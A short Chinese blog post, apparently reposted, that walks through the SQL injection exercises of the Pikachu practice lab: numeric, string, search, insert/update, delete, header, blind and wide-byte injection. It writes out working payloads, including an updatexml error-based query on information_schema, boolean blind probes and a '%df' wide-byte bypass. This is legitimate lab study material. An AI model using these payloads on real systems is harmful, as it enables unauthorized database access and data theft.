码迷,mamicode.com
首页 > 数据库 > 详细

pikachu的sql注入

时间:2019-12-18 21:50:18      阅读:155      评论:0      收藏:0      [点我收藏+]

标签:and   pos   substr   mamicode   sub   sql注入   ase   后台   post   

数字型注入(post)

 burp抓包

技术图片

 成功

技术图片

 

 

 

字符型注入(get)

 直接注入

 成功注入。

 技术图片

 

 

 

搜索型注入

技术图片

 使用同样的方法也能同样注入成功

 

xx型注入

需要闭合

 加)之后注入成功。

技术图片

 

 

 

 

 

insert/updata 注入

a‘ or updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name=‘member‘ limit 1,1)), 0) or ‘

burp抓包修改

技术图片

 

 

 

注入成功。

delete 注入

 

技术图片

 

 

 

 注入成功

 

 

http header注入

技术图片

 

 

 

 注入成功

 

盲注 base on boolian

技术图片

 

 

 

 

 

kobe and length(database())>5#
。。。
kobe and length(database())=7#
kobe and ascii(substr(database(), 1, 1)) > 105#
慢慢盲注,只能挨个试。。

盲注(based on time)

 同样的也是挨个试,这次看对错是看这个反应时间,要是可以的话就会五秒多一些。

技术图片

 

 

 

宽字节注入

 刚开始尝试发现注入不行,抓包发现以及进行了编码

 在抓包后修改也不行  

 发现‘被后台转移,所以构造payload kobe%df or 1=1#

技术图片

 

 

 

 技术图片

 

 

 

 注入成功

pikachu的sql注入

标签:and   pos   substr   mamicode   sub   sql注入   ase   后台   post   

原文地址:https://www.cnblogs.com/P201721440034/p/12063571.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!